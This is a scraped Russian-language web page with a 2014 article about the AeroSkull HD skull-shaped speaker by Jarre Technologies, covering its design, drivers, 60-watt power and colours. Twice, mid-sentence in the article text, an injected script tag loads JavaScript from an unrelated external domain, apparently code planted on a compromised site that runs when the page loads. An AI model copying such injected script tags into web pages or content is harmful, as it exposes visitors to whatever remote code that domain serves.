Запрашиваемая страница не найдена USD     CNY     EUR     JPY
Москва C
Последние новости
29 окт 2017, 17:29
Баварский автомобильный концерн BMW представил обновленную модель Gran Coupe 4...
Поиск

Какую марку автомобиля вы предпочитаете?

» » Колонка в виде черепа для меломана-неформала

Колонка в виде черепа для меломана-неформала

21 фев 2014, 08:58    odenisova
0 комментариев    6 277 просмотров

Колонка в виде черепа <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для меломана-неформала

Для меломанов имеет большое значения качество колонок для прослушивания музыки. А если любители хорошего звука вдобавок еще являются эстетами или оригиналами, то и внешний вид устройства находится для них далеко не на самом последнем месте в рейтинге предпочтений.

 

С качеством дело обстоит проще, достаточно небольшого серфинга в просторах интернета и нескольких дней прогулок по магазинам, и можно запросто стать обладателем прекрасной качественной акустической системы с поистине фантастическим звуком. Такие колонки органично впишутся в любой интерьер.

 

А вот любителям оригинальных аксессуаров придется посложнее. Они зачастую избегают идеальных форм с изгибами, правильными до миллиметра, находя их слишком банальными и скучными. Тем более, что многим порой хочется вырваться из-под гнета обыденности и вызвать удивление или даже шок окружающих. Как раз для таких целей лучше всего приобрести комплект колонок под названием AeroSkull HD.

 

По внешнему виду необычное устройство представляет собой череп в модных солнцезащитных очках. Подобный эпатажный и стильный предмет отлично украсит не только пещеру воинственного троглодита, но и квартиру закоренелого холостяка или комнату тинейджера.

 

Уникальная акустика произведена специалистами немецкой фирмы Jarre Technologies, которую основал знаменитый музыкант Жан-Мишель Жарр. Колонки подходят ко всем устройствам с разъемом типа Lightning, таким, как у брендовых смартфонов iPhone. Кроме того, для подключения внешних источников звука предназначено и стандартное гнездо аудиовхода.

 

Колонка в виде черепа <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для меломана-неформалаШикарное звучание обеспечивается двумя широкодиапазонными динамиками диаметра 57мм и одним низкочастотным - 102мм. При этом общая мощность составляет 60 ватт, так что запросто можно устроить в квартире вечеринку с дискотекой.

 

Корпуса пластиковых черепов сияют всеми цветами радуги, предусмотрено 11 цветов и оттенков, матовых и глянцевых. Даже дистанционный пульт управления выглядит очень необычно и эффектно, ведь он выполнен в виде кости человеческого скелета.

Читайте также
02 июл 2015, 13:30    0 комментариев
Японская фирма East Japan Railway, имеющая мировую славу и признание в сфере новейших транспортных технологий создала новый...
Комментарии
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent